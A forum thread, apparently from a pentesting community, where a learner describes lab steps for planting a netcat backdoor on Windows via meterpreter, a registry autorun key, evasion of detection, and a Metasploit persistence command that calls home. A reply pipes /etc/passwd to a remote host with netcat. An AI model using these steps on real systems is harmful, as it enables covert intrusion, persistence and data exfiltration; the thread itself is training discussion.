I spent the last few hours in the lab figuring out how to upload, autorun, and clean up all evidence that I had ever had a backdoor on a Windows box.

But I ran across a few things I could not figure out.

Steps:Got a meterpreter shell on the victimUploaded nc.exe to the system32 folderSet the regkey for running nc in listening mode at startupLogged in as the admin on the victim machineRebooted the victims server using meterpreter reboot cmdWaited for windows to rebootLogged in as admin on the victim serverConnected from BT using nc IP port command

Questions:

1. When in meterpreter, why can I only reboot the remote victims machine when someone is logged in on that machine?2. Why can I only connect to netcat on the victims machine when someone is logged in on that machine?

What am I doing wrong? Doing it this way just makes me more likely to get caught.

I did give the persistence a try and can now have meterprrter call home whenever I lose the sessions.

I used

Code:

run persistence -S -A -X -i 10 -p 445 -r 192.168.1.10

I am still lost on how an admin would use netcat to control a server. If he has to log into Windows to be able to make a connection to netcat... then he can control it that way... what is the point of netcat at that time?

Thanks. I thought netcat was a way for admins to administer their boxes, without using RDP. While I understand that is kind of silly for them to do, I just thought that was the "legitimate" purpose of netcat. To be honest, as a pentester, I think I would rather have a meterpreter connection then a netcat connection.

I did have issues where the persistence shell did not call home after a few exits. I will have to play around with it some more.

Will persistence still make a connection back to you when you reboot your attacking box? I would think so, but was unable to get it to work for me.

I'm sure there's been an admin or two that have tried, but it's really not a good solution. Hopefully they'd at least use socat or cryptcat and have it connect back to their system, not just bind so anyone on the network could access it

There are a lot of legitimate uses for netcat. It's great to do basic network tests (i.e. did the firewall change get implemented correctly?):

Code:

# nc -vv google.com 80

Connection to google.com 80 port [tcp/http] succeeded!

I also use it for copying information over the network where I don't want to setup something like file sharing.destination: # nc -lp 9999 > goodies.txtsource: # cat /etc/passwd | nc 192.168.1.99 9999

And yes, Meterpreter is preferred to netcat from a pen testing perspective, but it's not always feasible or possible. It's important to know how to get around with a basic shell on both *nix and Windows systems.

I'm not sure why you're not receiving a connection upon a reboot. It works for me:

Make sure you have your listener (multi/handler) setup and waiting for the connection. run persistence will do this for you with -A, but you'll have to configure it manually if you don't use that. Check the output of netstat -anp tcp on your Windows host to start troubleshooting.

Way to actually get your hands dirty and not just memorize trivia for your CEH